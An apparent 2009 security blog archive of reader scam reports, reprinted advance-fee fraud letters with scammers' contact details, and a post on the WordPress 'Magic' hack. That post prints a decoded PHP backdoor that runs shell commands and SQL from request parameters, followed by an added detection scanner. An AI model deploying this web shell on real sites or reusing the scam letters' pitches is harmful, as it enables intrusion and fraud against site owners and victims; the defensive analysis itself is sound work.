Archive for August, 2009
please help me what should i do now

I have sent my scanned passport copy as a PDF file to the following email address (used by a scammer who betrayed me in the context of money of a late person whose dormant account is present in Lloyds Bank of UK). The scammer uses the name of J. Eric, who is the executive of Lloyds Bank, and said that we will use the amount of that late person as beneficiary. The scammer's email is JericDanielsprivate@msn.com

Try reporting it to www.ic3.gov
also here:
U.S. Secret Service
Financial Crimes Division
1800 G Street, NW
Room 942
Washington, DC 20223
Phone: (202) 435–5850
Fax: (202) 435–5031
Or contact the local U.S. Secret Service Field Office.
Overseas

Contact the Foreign Commercial Service (FCS) at the nearest U.S. Embassy or Consulate. If there is no FCS office, contact the American Citizens Services Unit of the Consular Section or the Regional Security Office.

I BELIEVE I AM BEING SCAMMED.

I HAVE AN EMAIL FROM “DONATUS KPACHI” OF NIGERIA. I AM SURE IT IS A SCAM.

I HAVE THE FOLLOWING: CENTRAL BANK OF NIGERIA. CK 00450005, ACCT DRAWN ON CBN
90241710, MR. THOMAS R. RHODES THE AMOUNT OF $3,650,000.00. I AM SURE IT IS A SCAM.

JUST WANT TO SHARE MY EXPERIENCE WITH YOU.

THANKS,

THOMAS R. RHODES

Another Ghana Date Scammer “travis eurie”

I have been meeting someone online for about 4 months now, saying he is Travis Eurie. I just found out that he is from Ghana and a scammer of women for money, so beware of him.

e-mail from Alex Mbaki

To whom this may concern,
I received this message saying it was from Central Bank of Nigeria, Office of the Governor, Lagos, Nigeria. I even got a telegraphic transfer department payment slip C/O Tinubu Square, Lagos. I sent back the information they asked me for to see whether this was true or not, and I was told if I did not respond they would report me to the FBI in Nigeria. So what do you make of this? Give me a return e-mail answer please. Thank you.
Margie

mobile draw

respected sir,
I have received an SMS on my mobile saying I have won 500,000.00 GB POUNDS. I wanted to know how I can receive this money. For this I have to fulfill three documents as requested by the bank. For this I need the proof of winning (the certificate of award) and a copy of the fund release order. I wish to receive these as soon as possible. I have contacted Mr. Mark Davies, who is the director of operations. His contact number is +44 (871) 2344303, fax number: +44 (700) 5942618
email: bboperationdirector@gmail.com

I wish to receive a reply for this.
yours faithfully
Anoop Kumar OK

SRR Findings to IA Controls

From Reader:

I stumbled upon your site and am new to security working for a contractor. I’m attempting to complete a DIACAP POA&M and need to map SRR findings to IA controls – any idea where I might find this information?

The SRR findings reference the DOD Unix STIG and NIPR STIG. They don’t seem to completely match up to the DIACAP IA Controls, but that is where a good system security engineer / IA analyst comes in.

Once you’ve got your SRR results, IA Control compliance and mitigation depends on your situation. There are a few that map directly (like Screen Saver) but most of the SRR findings will fall under one or two of the IA Controls.

Hope this helps.

Thanks for your response *scam*

Thanks For Your Response‏
From: cheung.eric2008@asianbusinessmail.com (cheung.eric2008@asianbusinessmail.com)
Sent: Mon 7/27/09 12:16 AM
To: rj_murray@hotmail.com

First I wish to thank you for your response. I sincerely appreciate your interest to assist me in this transaction, however I would like to be sure of your willingness, trustworthiness and commitment to execute this project with me, I cannot afford to compromise these virtues and none of your personal information will be shared with anybody whatsoever, I have my principles.

About me and the funds: Like I said earlier, I am Mr. Cheung Eric Li Ka a Director of the Hang Seng Bank LTD Hong Kong. My client Col. Ahmad Ali Moh’d Hassan, who was with the Iraqi forces and also a Merchant, made a fixed deposit with a value of 15.5m USD for 18 months with my bank. Upon maturity several notices was sent to him but we did not hear from him or any of his relatives. It was later discovered that he and his family were killed in Iraqi war with NO living witness to this fund. Now what I want to do is to place you as the next of kin to my late client since he had none and have the funds released to you for the both of us to share in the ratio 50% for me and 50% for you.

I got hold of your email through the web directories and I had decided to contact you since I needed a reliable foreigner that can help me pull the funds out of my bank as I cannot do it myself and I do not want anyone around me (family, friends and my bank) to be aware that the move is from me. You should not have anything to worry about, as I want you to know that I have had everything planned out so that we shall come out successful. I have contacted an attorney that will prepare the necessary document that will back you up as the next of kin to Col. Ahmad Ali Mohamed Hassan, and all that is required from you at this stage is for you to provide me with your Full Names, your Age and Address so that the attorney can commence his job. The attorney will prepare the Affidavits which shall legally put you in place as next of kin, he will obtain the necessary clearances which will cover all the aspects involved in this transaction from the Hong Kong authorities including the Justice department.

What I expect from you is trust and commitment, I want this huge sum of money (Fifteen Million Five Hundred Thousand United State Dollars) transferred with your assistance. The fact that you are a foreigner give you the priviledge to stand in as my deceased client beneficiary and I assure you that none of his relatives will ever come for the funds. What bothers me most is that according to the laws of my country at the expiration of 4 years the funds will revert to the ownership of the Hong Kong Government if nobody applies to claim the funds. Hence, I want us to act fast and get this funds transferred in our favour and as a banker I know that if we follow up this transaction diligently it would be completed within 10 working days.

I want you to assure me that you will follow up this business seriously and as soon as I hear from you with your information, I shall give the Attorney a go-ahead to prepare the documents in your name. I shall be waiting for your response and assurance in this regard, you need to be someone whom I can rely upon, at least for absolute commitment.

I await your response

Eric Cheung

Scamletter – Mallam Sanusi Lamido Aminu Sanusi

CENTRAL BANK OF NIGERIA
CORPORATE HEAD QUARTERS
Zaria Street, Garki II, Abuja, Nigeria.

From: The Desk of
Mallam Sanusi Lamido Aminu Sanusi
Executive Governor Central Bank Of Nigeria
Direct Telephone +234 802 037 7660.

Re_ Diplomatic Arrangements Transfer of Twenty Five Million Five Hundred Thousand United States Dollars

I am Mallam Sanusi Lamido Aminu Sanusi Executive Governor Central Bank I write to inform you that the Board of Directors has concluded our final meeting today , with view of finalizing the entire arrangement toward the Diplomatic Transfer of your Contract fund valued at US$25. 5. Million. In view of the outcome of the meeting, we have finally concluded our decision to release your payment by this means. Base on the arrangement, one delegate have been appointed who will accompany the metallic truck Boxes to you in your country Their names will be given to you as soon we receive your responses today.

There intend rout travel with fly British Airline Business Class Flight. On their arrival, the delegates will get in touch with you by calling you on phone in order to conclude the arrangements necessary for the clearance of the Metallic Truck Boxes from the airport. For your information the delegates will leave as soon as we receive your acceptance letter or call me today on +234 802 037 7660. According to the nature of this arrangement, the metallic boxes will be covered with diplomatic immunity, which will protect the metallic truck boxes from any interrogation or security, therefore nobody have authority to tamper with the metallic truck boxes until it reaches the required destination.

Sequel to the Diplomatic arrangement you are hereby advice to make available the Clearance Charge due for the Clearance of the consignment at the Airport and to obtain a United Nation Diplomatic (Yellow Tag) which will be place at the body of the consignment before delivery it to your doorstep to avoid disturbance or searching from any security agency at the airport in your country. We there advice that, you should stick to the instructions of the delegate to foster smooth conclusion of the transaction,

Your can contact the diplomats on the emails address below.

Email: cbndiplomats@gmail.com

Please reconfirm the information under listed to the diplomats on his email address cbndiplomats@gmail.com

YOUR FULL NAME:______________________________________________________
YOUR ADDRESS :________________________________________________________
AIRPORT:______________________________________________________________
DIRECT TELEPHONE NUMBER:_____________________________________________
ANY COPY OF YOUR IDENTIFICATION IN PERSON INTERNATIONAL PASSPORT/DRIVING LINCENSE

NOTE: The above information is required urgently with your direct phone number which will be used to reach you any time.
I am online waiting for your urgent response you can reach me on +234 802 037 7660. for more direction and information’s.

Mr. Sanusi Lamido Aminu Sanusi
Executive Governor Central Bank of Nigeria

where to send scam emails

From Reader:

Been getting lots of scams out of Nigeria here in the USA. Where would I forward all scam letters to? Mine have been only attempts, no losses.

elamb[dot]security[at]gmail.com
http://www.consumerfraudreporting.org/
spam@uce.gov – Federal Trade Commission

Any scams that come from “@yahoo.com” should be sent to:
phishing@cc.yahoo-inc.com
mail-spoof@cc.yahoo-inc.com

Here is a really good page from consumerfraudreporting.org on reporting scam emails

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If you're getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic”, then you likely have infected code in your WordPress blog.

Wordpress Magic Attack

WordPress user Yokima reported this very slick hack.

FIX ACTION:
The fix is to update your blog; this will fix the issue. Make sure you change your password if you actually put your information in that “server at Magic” message box. Although updating the WordPress blog definitely fixes the issue, you may have to reload your plugins too because they may also have some infected code. Doing further research on this matter.

*Similar issue reported by techartist: “server BLAH.fuzz.com at Fuzz Access requires a username and password.”

What the infected code looks like after the malware injection into your blog.. yep.. uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{
    if (!function_exists('______safeshell'))
    {
        function ______safeshell($komut) {
            @ini_restore("safe_mode");
            @ini_restore("open_basedir");
            $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
            if (!empty ($komut)) {
                if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                    //@ ob_start();
                    @ passthru($komut);
                    //$res = @ ob_get_contents();
                    //@ ob_end_clean();
                }
                elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                    //@ ob_start();
                    @ system($komut);
                    //$res = @ ob_get_contents();
                    //@ ob_end_clean();
                }
                elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                    $res = @ shell_exec($komut);
                    echo $res;
                }
                elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                    @ exec($komut, $res);
                    $res = join("\n", $res);
                    echo $res, "\n";
                }
                elseif (@ is_resource($f = @ popen($komut, "r"))) {
                    //$res = "";
                    while (!@ feof($f)) {
                        //$res .= @ fread($f, 1024);
                        echo(@ fread($f, 1024));
                    }
                    @ pclose($f);
                }
                else
                {
                    $res = {$komut};
                    echo $res;
                }
            }
        }
    };
    if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
        echo "\n";
        if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
            eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
        }
        else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
            ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
        }
        else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
            $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
            if (!$result)
            {
                echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
                die();
            }
            else if (is_resource($result))
            {
                $res = array();
                while ($row = mysql_fetch_assoc($result))
                {
                    $res[] = $row;
                };
                mysql_free_result($result);
                echo serialize($res);
                die();
            }
            else
            {
                echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
                die();
            }
        };
        echo "\n\n";
        die();
    };
};

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.
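
A file and log check built from the indicators in the decoded code above (an added example, not part of the original post or of RocketWood's analysis): it flags PHP files containing the ______safeshell function name, the php_bdb7e9f039f4c7d9100073e131610a87 request key, or an eval of a decoded string, and picks out access-log lines carrying that key. The list of decoders, the function names and the sample data are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Indicators copied from the decoded code quoted on this page.
PAGE_INDICATORS = {
    "safeshell_function": re.compile(r"______safeshell"),
    "backdoor_request_key": re.compile(r"php_bdb7e9f039f4c7d9100073e131610a87"),
}
# Assumption: the "eval and a decode" wrapper uses one of these PHP decoders.
EVAL_DECODE = re.compile(
    r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)

def scan_text(text):
    """Return the sorted names of indicators found in one file's contents."""
    hits = {name for name, rx in PAGE_INDICATORS.items() if rx.search(text)}
    if EVAL_DECODE.search(text):
        hits.add("eval_of_decoded_string")
    return sorted(hits)

def scan_tree(root):
    """Scan every .php file under root; return {path: [indicator names]}."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip it, keep scanning the rest
        hits = scan_text(text)
        if hits:
            findings[str(path)] = hits
    return findings

def scan_access_log(lines):
    """Return the log lines whose request carries the backdoor parameter."""
    rx = PAGE_INDICATORS["backdoor_request_key"]
    return [ln for ln in lines if rx.search(ln)]

# Constructed samples (not captured from a real site).
SAMPLE_CLEAN = "<?php echo get_bloginfo('name'); ?>"
SAMPLE_INJECTED = "<?php eval(base64_decode('cGxhY2Vob2xkZXI=')); ?>"
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Aug/2009:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Aug/2009:10:00:05 +0000] '
    '"GET /index.php?php_bdb7e9f039f4c7d9100073e131610a87=exec HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(root).items():
        print(path, ", ".join(hits))
```

Run it against the WordPress root, plugin directories included, since the post notes plugins may carry the injected code too. Because the backdoor reads $_REQUEST, the key can also arrive in a POST body, which a standard access log does not record, so a clean log does not mean the files are clean.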